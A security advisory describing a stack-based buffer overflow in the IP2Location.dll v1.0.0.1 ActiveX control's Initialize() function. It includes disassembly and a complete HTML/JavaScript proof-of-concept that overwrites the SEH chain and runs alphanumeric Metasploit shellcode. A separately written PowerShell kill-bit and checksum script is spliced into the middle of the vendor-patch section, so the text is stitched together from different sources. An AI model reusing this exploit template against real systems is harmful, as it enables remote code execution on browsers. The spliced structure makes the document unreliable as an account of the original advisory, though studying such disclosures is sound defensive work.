IP2Location.dll Initialize() Stack Overflow Vulnerability
Published: 2010-05-31
Updated: 2010-06-01
Affected systems:
Hexasoft Development Sdn. Bhd. IP2Location 1.0.0.1
Description:
IP2Location is a geo-IP solution that helps identify the geographic location of visitors.
A stack overflow exists in the Initialize() function of IP2Location.dll. It is triggered by passing an overly long string as the regcode parameter when the following instructions execute:
038D1336 |. 50 |PUSH EAX ; User input
038D1337 |. 53 |PUSH EBX ; Destination address
038D1338 |. E8 D3420000 |CALL IP2Locat.038D5610
Inside IP2Locat.038D5610 the routine below runs, copying the user input to EDI and eventually overwriting the SEH chain. Testing showed that roughly 1912 bytes are needed to reach the SEH chain, but this may vary with the environment.
038D56A9 |> 8917 /MOV DWORD PTR DS:[EDI],EDX ; EDI = Destination; we own EDX
038D56AB |. 83C7 04 |ADD EDI,4
038D56AE |> BA FFFEFE7E MOV EDX,7EFEFEFF
038D56B3 |. 8B01 |MOV EAX,DWORD PTR DS:[ECX]
038D56B5 |. 03D0 |ADD EDX,EAX
038D56B7 |. 83F0 FF |XOR EAX,FFFFFFFF
038D56BA |. 33C2 |XOR EAX,EDX
038D56BC |. 8B11 |MOV EDX,DWORD PTR DS:[ECX]
038D56BE |. 83C1 04 |ADD ECX,4
038D56C1 |. A9 00010181 |TEST EAX,81010100
038D56C6 |.^74 E1 |JE SHORT IP2Locat.038D56A9
No access violation occurs until the program attempts the following:
038D12FC |. B8 041F9E03 MOV EAX,IP2Locat.039E1F04 ; ASCII "OK"
038D1301 |> 8B4D 6C MOV ECX,DWORD PTR SS:[EBP+6C] ; [EBP+6C] = 41414141
038D1304 |. C641 24 00 MOV BYTE PTR DS:[ECX+24],0 ; Access violation (we have control of ECX)
Exception: "Access violation when writing to [41414165]" at MOV BYTE PTR DS:[ECX+24],0
This allows an attacker to execute arbitrary code or cause a denial of service.
<* Source: sinn3r (x90.sinner@gmail.com)
Link: http://www.corelan.be:8800/wp-content/forum-file-uploads/sinn3r/ip2location_advisory_final.txt
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided solely for security research and educational purposes. Use at your own risk!
<html>
<head>
<title>IP2Location.dll v1.0.0.1 Initialize() Buffer Overflow by sinn3r</title>
</head>
<body>
<object classid='clsid:A3C8BFFA-1496-4188-A2BC-355A0B3DA0A7' id='ip2location'></object>
<script language="JavaScript">
/*
IP2Location.dll v1.0.0.1 Initialize() Buffer Overflow
Vulnerable v1.0.0.1 checksum: d86933ab58720c384bdc081d33684f7d
Patched v1.0.0.1 checksum : bf66e2ef8be3c301b381cfb424ad0afc (v3.0.1.0 is also patched)
Found and coded by sinn3r
http://twitter.com/_sinn3r
1) Script provided 'as is', without any warranty. Use for educational purposes only.
2) Do not use this code to do anything illegal, that's ridiculous!
3) You are not allowed to edit/modify this code. If you do, Corelan Security cannot be
held responsible for any damages this may cause.
*/
// ./msfpayload windows/messagebox exitfunc=thread TEXT="by sinn3r" TITLE="Demo by Corelan"
messagebox = "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIHYJKMK8Y2T7TZTP1XRNRRZVQ9YSTL"+
"KT1VPLKSFDLLKSFULLKG6THLK3NQ0LK7FP80OUH2UL3V95Q8QKOM1CPLK2LFD6DLKW5GLLK1DUU48C1JJLKQZUHL"+
"K1JWP31ZKKSVWG9LKP4LKEQJNP1KO6Q9PKLNLMTIP2TDJIQXOTMC1HGM9L1KOKOKOGKSLFDQ8RUYNLK0ZVDS1JKU"+
"6LKTLPKLK0ZELUQJKLKUTLK5QM8MYPDVDEL3QO3OB5XQ9YDMYZEK9O2RHLNPNDNZL62KXMLKOKOKOK9QUUTOKZO8"+
"NKPSPLGULWTPRZHLKKOKOKOLIW5THBH2LRL7PKO58VS6RVNU4CXT5T3CUCBK8QL7TUZMYM6PVKOV55TMYHBF0OKO"+
"XY20MOLLG5LFD0RM8QNKOKOKO582LSQ2NPXU8QS2OBRSUE8GPSRSIQ058G42ERMRO6Q9KMXQLWT4OK9JC3X2R68W"+
"P10SX592NRNVSE8U2BY7PRSVQIYMX0LQ439K9KQFQYBQB63PQPRKON06QIPPPKOF5UXEZA";
alignment = unescape(
"%58"+ //POP EAX
"%04%0B" //ADD AL, 0x0B
);
// Tested size = 10260 bytes
var padding1 = unescape("%41"); //Padding
while (padding1.length < 1912)
padding1 += unescape("%41");
var nseh = unescape("%EB%06%42%42"); //Short Jump
var seh = unescape("%71%33%6E%74"); //0x746E3371 msls31.dll IE6
var padding2 = unescape("%41"); //Padding
while (padding2.length < 10000)
padding2 += unescape("%41");
buffer = padding1 + nseh + seh + alignment + messagebox + padding2;
var arg1 = ip2location.Initialize(buffer);
</script>
</body>
</html>
Recommendations:
Workaround:
* Set the kill bit for CLSID A3C8BFFA-1496-4188-A2BC-355A0B3DA0A7.
Vendor patch:
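As an added, defender-side example (not part of the advisory or the vendor's software), the PowerShell below applies the kill-bit workaround above and classifies an installed IP2Location.dll against the MD5 checksums quoted in the PoC header; the function names and the InprocServer32 lookup are my assumptions, and it must be run from an elevated prompt.

```powershell
# Added example, not from the advisory: set/verify the ActiveX kill bit for the
# IP2Location control and check the registered DLL against the advisory checksums.
$clsid = '{A3C8BFFA-1496-4188-A2BC-355A0B3DA0A7}'
$killBitPath = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
$killBit = 0x400   # Compatibility Flags bit that tells IE never to instantiate the control

function Set-IP2LocationKillBit {
    if (-not (Test-Path $killBitPath)) {
        New-Item -Path $killBitPath -Force | Out-Null
    }
    # OR the kill bit into any flags already present instead of overwriting them
    $existing = (Get-ItemProperty -Path $killBitPath -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    $new = ([int]$existing) -bor $killBit
    New-ItemProperty -Path $killBitPath -Name 'Compatibility Flags' -Value $new -PropertyType DWord -Force | Out-Null
}

function Test-IP2LocationKillBit {
    $flags = (Get-ItemProperty -Path $killBitPath -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    return (($flags -band $killBit) -eq $killBit)
}

# MD5 checksums copied from the PoC header in the advisory
$knownHashes = @{
    'D86933AB58720C384BDC081D33684F7D' = 'vulnerable v1.0.0.1'
    'BF66E2EF8BE3C301B381CFB424AD0AFC' = 'patched v1.0.0.1'
}

function Get-IP2LocationDllStatus {
    param([string]$DllPath)
    if (-not (Test-Path $DllPath)) { return 'not found' }
    $md5 = (Get-FileHash -Path $DllPath -Algorithm MD5).Hash
    if ($knownHashes.ContainsKey($md5)) { return $knownHashes[$md5] }
    return "unknown build ($md5)"
}

# Find the DLL through the CLSID's InprocServer32 key (assumes the control is registered)
$inproc = Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid\InprocServer32" -ErrorAction SilentlyContinue
if ($inproc) { "DLL status: " + (Get-IP2LocationDllStatus -DllPath $inproc.'(default)') }

Set-IP2LocationKillBit
"Kill bit set: " + (Test-IP2LocationKillBit)
```

On 64-bit Windows the 32-bit Internet Explorer reads the same key under HKLM:\SOFTWARE\Wow6432Node\..., so apply the kill bit there as well.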
Hexasoft Development Sdn. Bhd.
------------------------------
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:
http://www.ip2location.com/